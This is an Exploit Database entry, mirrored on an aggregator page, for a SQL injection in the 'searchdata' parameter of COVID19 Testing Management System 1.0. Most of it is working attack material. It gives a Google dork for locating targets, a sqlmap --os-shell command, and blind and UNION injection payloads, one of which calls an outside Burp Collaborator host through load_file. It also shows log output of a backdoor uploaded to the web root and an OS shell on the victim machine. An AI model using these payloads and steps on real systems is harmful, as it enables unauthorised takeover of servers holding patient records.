COVID19 Testing Management System 1.0 – ‘searchdata’ SQL Injection

• Exploit Database
• 16 阅读

• 作者： Ashish Upsham
  日期： 2021-08-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50190/

• # Exploit Title: COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection
  # Google Dork: intitle: "COVID19 Testing Management System"
  # Date: 09/08/2021
  # Exploit Author: Ashish Upsham
  # Vendor Homepage: https://phpgurukul.com
  # Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
  # Version: v1.0
  # Tested on: Windows
  
  Description:
  
  The COVID19 Testing Management System 1.0 application from PHPgurukul is vulnerable to
  SQL injection via the 'searchdata' parameter on the patient-search-report.php page.
  
  ==================== 1. SQLi ====================
  
  http://192.168.0.107:80/covid-tms/patient-search-report.php
  
  The "searchdata" parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated
  user has the full ability to run system commands via --os-shell and fully compromise the system
  
  POST parameter 'searchdata' is vulnerable.
  
  step 1 : Navigate to the "Test Report >> Search Report" and enter any random value & capture the request in the proxy tool.
  step 2 : Now copy the post request and save it as test.txt file.
  step 3 : Run the sqlmap command "sqlmap -r test.txt -p searchdata --os-shell"
  
  ----------------------------------------------------------------------
  Parameter: searchdata (POST)
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') AND (SELECT 4105 FROM (SELECT(SLEEP(5)))BzTl) AND ('Rxmr'='Rxmr&search=Search
  
  Type: UNION query
  Title: Generic UNION query (NULL) - 5 columns
  Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') UNION ALL SELECT NULL,NULL,CONCAT(0x716a767071,0x59514b74537665486a414263557053556875425a6543647144797a5a497a7043766e597a484e6867,0x7176767871),NULL,NULL,NULL,NULL-- -&search=Search
  
  [19:14:14] [INFO] trying to upload the file stager on '/xampp/htdocs/' via UNION method
  [19:14:14] [INFO] the remote file '/xampp/htdocs/tmpuptfn.php' is larger (714 B) than the local file '/tmp/sqlmap_tng5cao28/tmpaw4yplu2' (708B)
  [19:14:14] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpuptfn.php
  [19:14:14] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpbmclp.php[19:14:14] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
  os-shell> whoami
  do you want to retrieve the command standard output? [Y/n/a] y
  command standard output:'laptop-ashish\ashish'
  os-shell>